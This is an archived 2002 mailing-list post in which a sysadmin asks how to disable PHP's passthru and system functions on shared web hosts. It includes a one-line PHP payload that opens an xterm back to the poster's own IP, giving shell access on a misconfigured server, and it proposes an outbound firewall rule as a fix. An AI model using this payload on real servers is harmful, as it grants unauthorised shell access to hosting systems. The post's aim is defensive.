Vulnerability Development mailing list archives
php & passthru & system
From: Evrim ULU <evrim () envy com tr>
Date: Tue, 23 Apr 2002 11:15:22 +0300
hi,i was wondering if there is a way to disable the passthru and system functions in php easily.
There are a lot of webhosting firms serving php with ftp accounts and i've seen that if their firewall is not configured properly i can open a xterm with my user priviledges.
<? passthru("`which xterm` --display=my_ip:0.0"); ?> same thing for system is also valid of course.Abusing the system after having the shell access is easy. Most of the sysadms do not patch the system since nobody have a valid shell access.
Is there an easy way to disable these function before compilation&after compliation and any firewall rules like -A OUTPUT -p tcp --destination-port 6000 -j DROP?
thnx. -- Evrim ULU evrim () envy com tr / evrim () core gen tr sysadm http://www.core.gen.tr
Current thread:
- php & passthru & system Evrim ULU (Apr 24)
- Re: php & passthru & system Jedi/Sector One (Apr 24)
- <Possible follow-ups>
- RE: php & passthru & system Lloyd Richardson (Apr 24)